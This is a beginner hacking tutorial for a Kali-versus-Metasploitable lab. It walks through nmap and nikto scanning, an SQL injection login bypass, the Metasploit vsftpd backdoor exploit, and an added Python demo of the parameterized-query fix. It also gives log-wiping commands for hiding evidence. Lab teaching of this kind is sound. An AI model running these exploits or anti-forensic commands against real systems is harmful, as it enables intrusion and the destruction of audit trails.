🛠️ Hacking Practice Guide: A Step-by-Step Tutorial for Beginners

Hello! 😃 This guide is designed to help you practice hacking in a structured and easy-to-follow way.

Even if you are new to hacking, you can follow this step-by-step guide and complete the exercises successfully. 🚀




1️⃣ Setting Up the Practice Environment 🏗️

1. Installing a Virtual Machine

Hacking practice should be done in a safe, isolated environment, not on a real system.
We will use VirtualBox or VMware to set up virtual machines.

📌 Required Software Downloads:

Installation Steps:

  1. Install VirtualBox.
  2. Add Kali Linux and Metasploitable as separate virtual machines.
  3. Set Kali Linux as the attacker machine and Metasploitable as the target server.
  4. Connect both virtual machines to the same network (Host-Only Adapter).

Now, you're all set! 🎉


2️⃣ Information Gathering (Reconnaissance) 🕵️‍♂️

Before attacking a target, we must first gather information about it.
In this stage, we will find the target system's IP address, open ports, and running services.

📌 1. Finding the Target IP Address

Open the terminal in Kali Linux and run the following command:

bash
netdiscover

👉 This will reveal the IP address of the Metasploitable (target) machine.


📌 2. Scanning for Open Ports

To check which services are running, we use a tool called Nmap.

bash
nmap -sS -A [Target IP]

👉 This command will display open ports and running services.

💡 Example Nmap Scan Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.3
80/tcp   open  http    Apache httpd 2.2.8
3306/tcp open  mysql   MySQL 5.0.51

Now, we know which services (web server, database, etc.) are running on the target system! 👀


3️⃣ Vulnerability Scanning (Scanning & Enumeration) 🔎

Now, let's start analyzing the system for vulnerabilities.

📌 1. Checking for Web Server Vulnerabilities

Metasploitable contains intentionally vulnerable web applications.
Open a web browser and visit http://[Target IP].

✅ You will see several vulnerable web applications.
✅ The target we will focus on is "Mutillidae".

Now, let's scan the website for security issues!

bash
nikto -h [Target IP]

👉 Nikto will automatically detect security flaws in the web server.


4️⃣ Exploiting Vulnerabilities (Exploitation) 💥

Now, let's perform an actual attack.
We will try SQL Injection (database attack) to bypass login authentication.

📌 1. Bypassing Admin Login with SQL Injection

  1. Open the Mutillidae website.
  2. Find the Login page.
  3. Enter the following credentials:
    • Username: ' OR 1=1 --
    • Password: (Leave empty)

👉 Click "Login," and you will successfully log in as an administrator! 🎯

This attack technique is called SQL Injection, where poorly protected web applications allow unauthorized access to the database.
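
Why the login form accepts that username, shown as an added example that is not part of the original post and is not Mutillidae's code: the first login function builds its query by string concatenation, the second binds the same input through placeholders. The `accounts` table, its rows and all function names are constructed for illustration and use Python's built-in sqlite3.

```python
import sqlite3

PAYLOAD = "' OR 1=1 --"  # the username string from the exercise above


def make_db():
    # Constructed sample data (hypothetical schema, not Mutillidae's).
    # Plaintext passwords only keep the demo short; real systems store hashes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("admin", "constructed-admin-pw"), ("alice", "constructed-alice-pw")],
    )
    return db


def build_concatenated_sql(username, password):
    # Vulnerable pattern: user input becomes part of the SQL text itself.
    return (
        "SELECT username FROM accounts WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(db, username, password):
    row = db.execute(build_concatenated_sql(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    # Hardened pattern: the statement is fixed and values are bound separately,
    # so quotes and comment markers in the input are compared as plain data.
    row = db.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The quote closes the literal, OR 1=1 matches every row, -- drops the password check.
    print("query sent:   ", build_concatenated_sql(PAYLOAD, ""))
    print("concatenated: ", login_vulnerable(db, PAYLOAD, ""))
    print("parameterized:", login_parameterized(db, PAYLOAD, ""))
    print("valid login:  ", login_parameterized(db, "alice", "constructed-alice-pw"))
```

The parameterized version still accepts a correct username and password, so the fix changes only how input reaches the database, not the login logic.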


5️⃣ Privilege Escalation 🚀

Now, let's go beyond web hacking and gain root (administrator) access to the target system.

📌 1. Exploiting a Vulnerability with Metasploit

Open the terminal in Kali Linux and start Metasploit:

bash
msfconsole

Once Metasploit is running, enter the following commands:

bash
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS [Target IP]
set PAYLOAD cmd/unix/interact
exploit

👉 Success! You now have access to the target server! 🎉

Now, you can execute further attacks inside the system.


6️⃣ Covering Tracks (Hiding Evidence) 🕶️

Just because you've hacked into a system doesn't mean your job is done!
To avoid detection, you need to erase logs and hide evidence.

📌 1. Clearing Command History

bash
history -c

📌 2. Deleting Log Files

bash
echo "" > /var/log/auth.log
echo "" > /var/log/syslog

Now, no one will know that you were ever there! 😎


7️⃣ Final Steps: What to Do After Hacking Practice 📝

Reset your virtual machine after each practice session!
Always practice in a legally authorized environment.
Use your knowledge to improve security, not to harm others.

Now, you've learned the basics of hacking! 🎉
If you want to go deeper, explore web hacking, system hacking, and network hacking topics.

🔥 Want to try more advanced hacking exercises? Stay tuned for the next tutorial!
